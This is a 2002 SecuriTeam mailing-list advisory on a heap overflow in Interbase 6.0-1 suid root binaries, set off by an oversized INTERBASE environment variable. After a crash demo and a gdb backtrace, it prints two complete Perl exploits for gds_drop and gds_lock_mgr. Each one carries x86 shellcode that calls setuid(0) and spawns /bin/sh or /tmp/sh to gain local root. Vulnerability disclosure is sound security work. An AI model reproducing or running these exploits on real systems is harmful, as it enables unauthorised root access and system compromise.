[UNIX] Interbase malloc() Security Issues (INTERBASE)

From: support@securiteam.com
Date: 06/23/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 23 Jun 2002 21:52:30 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Interbase malloc() Security Issues (INTERBASE)
------------------------------------------------------------------------

SUMMARY

 <http://www.borland.com/interbase/> Interbase is a high-performance,
cross-platform, and SQL standards--compliant relational database. A
security vulnerability in the product allows local attackers to overflow
an internal buffer causing it to execute arbitrary code.

DETAILS

Vulnerable systems:
 * Interbase versions 6.0-1

Interbase-6.0-1.i386.rpm provided with Mandrake 7.2 contains an issue when
reading the environment variable "INTERBASE". This issue is demonstrated
below.

[dotslash@ghetto dotslash]$ export INTERBASE=`perl -e 'print "A" x 500'`
[dotslash@ghetto dotslash]$ /usr/local/interbase/bin/gds_drop
Segmentation fault

This issue results in a malloc() overflow.
 
The following suid root binaries are potentially exploitable.
/usr/local/interbase/bin/gds_drop
/usr/local/interbase/bin/gds_inet_server
/usr/local/interbase/bin/gds_lock_mgr

(gdb) r
Starting program: /usr/local/interbase/bin/gds_drop

Program received signal SIGSEGV, Segmentation fault.
0x400a0832 in ptmalloc_init () at malloc.c:1696
1696 malloc.c: No such file or directory.
        in malloc.c
(gdb) bt
#0 0x400a0832 in ptmalloc_init () at malloc.c:1696
#1 0x400a4e64 in malloc_hook_ini (sz=364, caller=0x40092571) at
malloc.c:1856
#2 0x400a0f8d in __libc_malloc (bytes=364) at malloc.c:2798
#3 0x40092571 in _IO_new_fopen (
    filename=0xbfffd65c 'A' <repeats 200 times>..., mode=0x80583c0 "r")
    at iofopen.c:50
#4 0x0804a244 in ISC_get_config ()
#5 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
 
Impact:
Local root can be exploited.

Vendor status:
Vendor has been contacted however, no offical response has received of as
today.

Exploit (gds_drop):
#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#

($offset) = @ARGV,$offset || ($offset = 0);

$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$ENV{"FOO"} = $sc;

$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_drop");

Exploit (gds_lock_mgr):
#!/usr/bin/perl -w
#
# gds_lock_mgr exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# Note: We cannot attach to an interactive shell so it
# will execute /tmp/sh instead...
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#

($offset) = @ARGV,$offset || ($offset = 0);

$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

$ENV{"FOO"} = $sc;

$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_lock_mgr");

ADDITIONAL INFORMATION

The information has been provided by <mailto:dotslash@snosoft.com> KF.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages